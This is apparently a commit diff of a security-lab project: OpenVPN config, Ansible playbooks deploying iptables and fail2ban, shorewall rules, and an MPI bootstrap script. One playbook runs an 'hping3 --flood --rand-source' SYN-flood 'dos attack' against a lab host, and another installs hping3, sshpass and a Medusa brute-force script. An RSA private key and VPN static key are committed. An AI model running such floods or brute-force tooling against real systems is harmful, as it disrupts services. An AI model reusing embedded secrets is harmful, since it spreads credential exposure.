</key>
<cert>
-----BEGIN CERTIFICATE-----
MIIDWDCCAkCgAwIBAgIRAOKsUA1kgRB5+57ZaH6Wb7UwDQYJKoZIhvcNAQELBQAw
FjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ1MjI4WhcNMjQwMTA4
MDQ1MjI4WjAUMRIwEAYDVQQDDAlzZWNfdnBuXzUwggEiMA0GCSqGSIb3DQEBAQUA
A4IBDwAwggEKAoIBAQCg9D/IFmmR74x7kTMBpnz7/xRczL1SLcvqk2EgCwFsHHHv
tEEu/wdEgJLKoaF4gTpPQ4NaZ51e5XsGd7CHwg9B4EW5bydfw16L9V7X54C/Abpo
/LS/kT1sLbBMxR5nLuU0WarokE1ivQ2qgOFsrlPfvYDkhuxGZ6TBMZR4WQC10D6A
gPWXF3L0Ld3GlxzzKNDe6zwynEVnNw2wLO0KmZ6i5x2dkvcMn3zwgEy1RTS2OF6U
9qpWadmjSsND7caR4Am4XKSYNuI4DsyzQJEMctbOrMTTeNIYJKuAnX1Yp4dXK5cN
7YT5hnJfnBr1H3vkmUh1oaYBToOQhLCMrwjgvTH3AgMBAAGjgaIwgZ8wCQYDVR0T
BAIwADAdBgNVHQ4EFgQUOCps54FTjSKrRlht5Wq5H5cktQUwUQYDVR0jBEowSIAU
KlyCEGrvQQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENB
ghRRbPy2wgF5KGujBMDYrBlsIPEx/jATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNV
HQ8EBAMCB4AwDQYJKoZIhvcNAQELBQADggEBAKERF5PiEx71LlLgjtn55HYRUhPI
SYRlcTaaKjONY4fpAM4HQx51Q1GKl8AviTKEHa+j4zqaIVdNj5xnKtv5EdEPcVHp
f7Ifc1D/8D9ulFyaC8M1GyfbUr4rSgfkQDCcn20rdt8ftIfq+MdcBw078/9ql7e1
w+sD7HgOWR/sOP8tXiHHmy9j9kw/a8SNOROqmjrGl5bRaSkEwDQjoTP28Cqig2Jy
5yXav/Ql6+YlFkCaDyiSbMpVz5PNc09m91ZJvw+ki6Ox/SKDAQGBxx4/M8OkBv3W
YEdf/Bgd4if5nu89zbO0yMoYXRNtzVoquXc59CSAcnIUD9x0qqFCSStlrnE=
-----END CERTIFICATE-----
</cert>
<ca>
-----BEGIN CERTIFICATE-----
MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL
BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw
MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN
AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm
43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH
NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX
4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX
/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk
Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd
BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv
QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2
wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq
hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT
f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/
+evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN
hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H
tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg
J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw==
-----END CERTIFICATE-----
</ca>
key-direction 1
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
d4d47aea6be3bda4549f485b7c38d287
312509957ccf26428848e3095c429eee
99196bd9edb0da94b5c9209debd8d455
41bce3ed5f5631031775359d49e49d87
8af81b53e7f909d1b47a1fbc03e2206b
98bf518e41a43da80a652e19e39dae39
7fa5ab1a7aff1b141b1952c1f61296b1
363fc7a891a21acc354253e9a6a5123f
8e36e40b486b7ba40542f77749b45bf5
27b5899c26333e11a18e90a6857f3c36
49abe06d3afabee6f97cbc65fcc6e74e
6db46cd53e71ef4412b7328a278e9de2
d50adaf4c942600aba4c011fa04d1368
87ffd6f73adc9b7a772efb570e59f798
e8cdd96c8dbc018535c3e04170dd309d
1809e77f2f216d6fc95d706ae5400eab
-----END OpenVPN Static key V1-----
</tls-auth>

2
project/second_script.sh
View File

@ -0,0 +1,2 @@
ansible-playbook -u docker -i inventory_w.yml test2.yml -f 4 --ask-pass --ask-become-pass

4
project/sshkey_script.sh
View File

@ -0,0 +1,4 @@
#!/bin/bash
ssh-keygen
ssh-copy-id docker@172.21.0.6

5
project/test-ping.retry
View File

@ -0,0 +1,5 @@
172.27.0.2
172.27.0.3
172.27.0.4
172.27.0.5
172.27.0.6

27
project/test-ping.yml
View File

@ -0,0 +1,27 @@
---
- hosts: service
remote_user: docker
sudo: yes
gather_facts: no
vars:
user: "docker"
tasks:
# ping async
- name: pingtome
command: ping 10.80.0.2
async: 30
poll: 0
- name: Refresh connection
meta: clear_host_errors

5
project/test.retry
View File

@ -0,0 +1,5 @@
172.27.0.2
172.27.0.3
172.27.0.4
172.27.0.5
172.27.0.6

113
project/test.yml
View File

@ -0,0 +1,113 @@
---
- hosts: service
remote_user: docker
sudo: yes
gather_facts: no
vars:
user: "docker"
tasks:
# make directory
- name: make dir for data
become: true
file:
path: "/var/lab/playground/playground-readmongo"
state: directory
owner: docker
group: docker
mode: '0777'
# pare google.com
# - name: google.com
# become: yes
# become_user: "{{ user }}"
# command: curl http://www.google.com
# ignore_errors: yes
# register: configwww
# - name: ls configwww
# debug: var=configwww.stdout_lines
# rm dir
# - name: remove dir
# become: yes
# become_user: "{{ user }}"
# command: rmdir new_dir
# ignore_errors: yes
# register: rmvdir
# - name: ls rmvdir
# debug: var=rmvdir.stdout_lines
# transfer script iptables gia er. 1
- name: Transfer script iptables_rules.
copy: src=iptables_rules.sh dest=/home/docker mode=0777
# transfer script fail2ban gia er.2
- name: Transfer script fail2ban.
copy: src=fail2ban_script.sh dest=/home/docker mode=0777
# install openvpn gia er.4
- name: Ansible apt install openvpn.
become: true
apt:
name: openvpn
state: present
update_cache: true
# install fail2ban gia er.2
- name: Ansible apt install fail2ban.
become: true
apt:
name: fail2ban
state: present
update_cache: true
# ls -al for testing
- name: ls -al
become: yes
become_user: "{{ user }}"
command: ls -al #/etc
ignore_errors: yes
register: config
- name: ls config
debug: var=config.stdout_lines
# netstat -antlupe
# - name: netstat
# become: yes
# become_user: "{{ user }}"
# command: netstat -antlupe
# ignore_errors: yes
# register: ant
# - name: ls ant
# debug: var=ant.stdout_lines
- name: Refresh connection
meta: clear_host_errors

4
project/test2.retry
View File

@ -0,0 +1,4 @@
172.27.0.3
172.27.0.4
172.27.0.5
172.27.0.6

76
project/test2.yml
View File

@ -0,0 +1,76 @@
---
- hosts: service
remote_user: docker
sudo: yes
gather_facts: no
vars:
user: "docker"
tasks:
# ls -al test
# - name: ls -al
# become: yes
# become_user: "{{ user }}"
# command: ls -al
# ignore_errors: yes
# register: config
# - name: ls config
# debug: var=config.stdout_lines
# transfer script update
- name: Transfer script.
copy: src=script_update.sh dest=/home/docker mode=0777
# exec script
- name: Exec script_update.
command: sh /home/docker/script_update.sh
# transfer script iptables
# - name: Transfer script iprules.
# copy: src=iptables_rules.sh dest=/home/docker mode=0777
# transfer script imedusa
- name: Transfer script medusa.
copy: src=medusa_script.sh dest=/home/docker mode=0777
# transfer script fail2ban
# - name: Transfer script fail2ban.
# copy: src=fail2ban_script.sh dest=/home/docker mode=0777
# transfer script sshkey_script
# - name: Transfer script sshkey.
# copy: src=sshkey_script.sh dest=/home/docker mode=0777
# install hping3
- name: Ansible apt install hping3.
become: true
apt:
name: hping3
state: present
update_cache: true
# install sshpass
- name: Ansible apt install sshpass.
become: true
apt:
name: sshpass
state: present
update_cache: true
# refresh
- name: Refresh connection
meta: clear_host_errors

4
project/test3.retry
View File

@ -0,0 +1,4 @@
172.29.0.3
172.29.0.4
172.29.0.5
172.29.0.6

60
project/test3.yml
View File

@ -0,0 +1,60 @@
---
- hosts: service
remote_user: docker
sudo: yes
gather_facts: no
vars:
user: "docker"
tasks:
# ls -al
# - name: ls -al
# become: yes
# become_user: "{{ user }}"
# command: ls -al
# ignore_errors: yes
# register: config2
# - name: ls config2
# debug: var=config2.stdout_lines
# dos attack async
- name: dos attack
command: sudo hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.21.0.2 -y
async: 120
poll: 0
# ls -al
# - name: ls -al
# become: yes
# become_user: "{{ user }}"
# command: ls -al
# ignore_errors: yes
# register: config3
- name: ls config3
debug: var=config3.stdout_lines
- name: Refresh connection
meta: clear_host_errors

5
project/test_fail2ban.retry
View File

@ -0,0 +1,5 @@
172.27.0.2
172.27.0.3
172.27.0.4
172.27.0.5
172.27.0.6

21
project/test_fail2ban.yml
View File

@ -0,0 +1,21 @@
---
- hosts: service
remote_user: docker
sudo: yes
gather_facts: no
vars:
user: "docker"
tasks:
# exec script fail2ban
- name: Exec fail2ban_script.
command: sh /home/docker/fail2ban_script.sh
- name: Refresh connection
meta: clear_host_errors

5
project/test_iptables_rules.retry
View File

@ -0,0 +1,5 @@
172.27.0.2
172.27.0.3
172.27.0.4
172.27.0.5
172.27.0.6

21
project/test_iptables_rules.yml
View File

@ -0,0 +1,21 @@
---
- hosts: service
remote_user: docker
sudo: yes
gather_facts: no
vars:
user: "docker"
tasks:
# exec script iptables
- name: Exec iptables_rules.sh.
command: sh /home/docker/iptables_rules.sh
- name: Refresh connection
meta: clear_host_errors

72
sec_bootstrap
View File

@ -0,0 +1,72 @@
#!/bin/sh
ROLE="undefined"
MPI_MASTER_SERVICE_NAME="sec_master"
MPI_WORKER_SERVICE_NAME="sec_worker"
HOSTNAMES="/etc/nethosts"
#######################
# ARGUMENTS PARSER
while [ "$1" != "" ];
do
PARAM=$(echo "$1" | awk -F= '{print $1}')
VALUE=$(echo "$1" | awk -F= '{print $2}')
case $PARAM in
role)
[ "$VALUE" ] && ROLE=$VALUE
;;
sec_master_service_name)
[ "$VALUE" ] && MPI_MASTER_SERVICE_NAME=$VALUE
;;
sec_worker_service_name)
[ "$VALUE" ] && MPI_WORKER_SERVICE_NAME=$VALUE
;;
*)
echo "ERROR: unknown parameter \"$PARAM\""
exit 1
;;
esac
shift
done
cat > /etc/opt/service_names <<- EOF
MPI_MASTER_SERVICE_NAME=${MPI_MASTER_SERVICE_NAME}
MPI_WORKER_SERVICE_NAME=${MPI_WORKER_SERVICE_NAME}
EOF
case $ROLE in
"master")
# Auto update default host file in background and dumb all output
auto_update_hosts "${HOSTNAMES}" > /dev/null 2>&1 &
# Start ssh server
/usr/sbin/sshd -D
;;
"worker")
# Start ssh server in background
/usr/sbin/sshd -D &
# Keep trying to connect to master node and stay there indefinitely so that master node can see
# the connected hosts that are ready for MPI work
while sleep 1
do
# shellcheck disable=SC2086
ssh -T -o "StrictHostKeyChecking no" \
-i "${USER_HOME}/.ssh/id_rsa" \
${USER}@${MPI_MASTER_SERVICE_NAME} \
"tail -f /dev/null"
done
;;
*)
echo 'role argument only accepts "master" or "worker"'
esac

6
shorewall/interfaces
View File

@ -0,0 +1,6 @@
### Comments, comments, and more comments.
#
#ZONE INTERFACE BROADCAST OPTIONS
#
net eth0 detect tcpflags,nosmurfs
#LAST LINE -- ADD YOUR ENTRIES BEFORE THIS ONE -- DO NOT REMOVE

11
shorewall/policy
View File

@ -0,0 +1,11 @@
### Comments, comments, and more comments.
#SOURCE DEST POLICY LOG LEVEL LIMIT:BURST
#
net fw ACCEPT
fw net ACCEPT
net all DROP
# THE FOLLOWING POLICY MUST BE LAST
all all REJECT info
#LAST LINE -- ADD YOUR ENTRIES ABOVE THIS LINE -- DO NOT REMOVE

11
shorewall/rules
View File

@ -0,0 +1,11 @@
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/
# PORT PORT(S) DEST LIMIT GROUP
#ACCEPT net fw tcp 80
#ACCEPT fw net tcp 80
#ACCEPT net fw udp 53
#ACCEPT fw net udp 53
#REJECT net fw udp 53
#REJECT fw net udp 53
#ACCEPT net:14.15.16.112/27 fw icmp 8
#LAST LINE -- ADD YOUR ENTRIES BEFORE THIS ONE -- DO NOT REMOVE

6
shorewall/zones
View File

@ -0,0 +1,6 @@
### Comments, comments, and more comments.
#ZONE TYPE OPTIONS IN OUT
# OPTIONS OPTIONS
fw firewall
net ipv4
#LAST LINE - ADD YOUR ENTRIES ABOVE THIS ONE - DO NOT REMOVE

27
ssh/id_rsa
View File

@ -0,0 +1,27 @@
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAoKG1DtjMXHDJfF59Y5nO7Yl38fkjRL1LQhF7RZKbGScWBNIW
foAS0wrd3wUnd5YMtIeiBj98H+V8IEn0ChAAxGfHXqqmmYlU6ABESINob+h70Bnm
UwiRbRnA64o3d9+cz2T8YLf+1p7///Z8LA8U+7rS+kvKvtYCQ9llDAxtbe39CxCs
2HASam3U6VArq9SdSqph5MudBaYhaxx4V8VDdXEhG2pimlh8e7zdPZ8AYbYLLDhq
Ytd+wn9azLXPQ3w/vC+Pn4taUBYnlERDY45vaVsPdnR+ao9ckMLUS6EwJVQmgMzB
2yyNCbPQYvRPL0rxoGstfCmmjY3EzOh6kEA6wwIDAQABAoIBAHqrAxnTdj0h5LyV
bCwjyWKdGHwxRj24UUCjGQCIdOlAcBA+X+863yVLpyQpS3qHnCxBZ/pdgOza02/V
CgilL/DNT/N7Xr7hoXWKvpqhv5+2atcA8GN4p5YplKpLYxCoM5guBo3V9UbxJY7T
LQB4hA25HmUGfE5AIHqwCfqpgufvIO1enhe1Vh/6l1FJqJuNj2pBGeXOyOMV95GN
xC5/BVytJIx2Rts5qtwpt5iPE3pKdsrWc71qACxk3dG8h9OZnuE3vuCg/Wp8jdwk
NHZ6nWlt0BbST3wN0pyTp6cqtZ0qqfSpZCVRegeQW5ENR9NaigDX6RADKRnms46J
ziDSZAECgYEA0WBDY47CA9Ej0Y2zBcV3x03cznSnxr7BVty32xbnNgxGF5jNUDdU
E2JwJs86sV75VV0fpgrbN45lBV/2ImefrPr4kJAIL2J4eyVdOTTT/DO9Tuw6NP8R
AYMZOzOlgFjx3arnjlOK5AicFseWFCXvezuAMPcGpImgw7xHHM3RcFcCgYEAxGa2
T+J119HWf15kN7bx5RaUl9J4DvvE5oHtA7zsMPO2fRpfwXAb8yKwIXfZ7186frPb
jo3ZQykcPuJ3MldvTWEuUhY5W1HSF1sBJOPZHuRfQicv8Uj4Y1kWltQf4Ikb3Uyh
T0fZJul4HkPAo/Q65zIAtJ9tWukAP/lmnwO9VXUCgYEAiY62F4WmH/3ai4WOFX+b
5xxXsmhgBiozOc8/F7jfZNoBfuVMFqSTHz0wM784b2nXY+cPsPY2+jQaWMKoIgh0
lqA4iDmotwD56OYubjQwBeU0PdLjlwfw805fWE7hMAa/uQPcp9xpRtIFQs4T4t7d
jNgVq5XQDm/BaHedPOZX8HcCgYEAuKpu31vqO7wUt/vTtUMx3JpHqxz9P/FgqPAf
H/WiC0EMJEMJKAO2c/z4qO9dHiJnCL0qQraDQw/DfClJtC7b+2DVwd8dnQyowscR
o1MNUmueWcAo5vEag6c/gx/+vQuOBJ1JyxaeSmUZSTOhTUeVns64NRz2IJWWY5Cn
+fn1KwUCgYEAjYYeQX/W+2r8SFipPQQi/36EqLPwko58C/sbJR0gySP6El7hNQRt
Sdmd9hfMXRR+VCZWmmzb6T4fc80XxteI9eANkZ7xhNuQe11EDvPqmc9WSF0s+l1T
eQnkt+an7Qv2prDSU6d1KlOrOuCXU8IhbkuffvRSYXwK9T79bTG8iIQ=
-----END RSA PRIVATE KEY-----

1
ssh/id_rsa.pub
View File

@ -0,0 +1 @@
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCgobUO2MxccMl8Xn1jmc7tiXfx+SNEvUtCEXtFkpsZJxYE0hZ+gBLTCt3fBSd3lgy0h6IGP3wf5XwgSfQKEADEZ8deqqaZiVToAERIg2hv6HvQGeZTCJFtGcDrijd335zPZPxgt/7Wnv//9nwsDxT7utL6S8q+1gJD2WUMDG1t7f0LEKzYcBJqbdTpUCur1J1KqmHky50FpiFrHHhXxUN1cSEbamKaWHx7vN09nwBhtgssOGpi137Cf1rMtc9DfD+8L4+fi1pQFieURENjjm9pWw92dH5qj1yQwtRLoTAlVCaAzMHbLI0Js9Bi9E8vSvGgay18KaaNjcTM6HqQQDrD nlknguyen@NN-Ubuntu
Write Preview
Loading…
Cancel
Save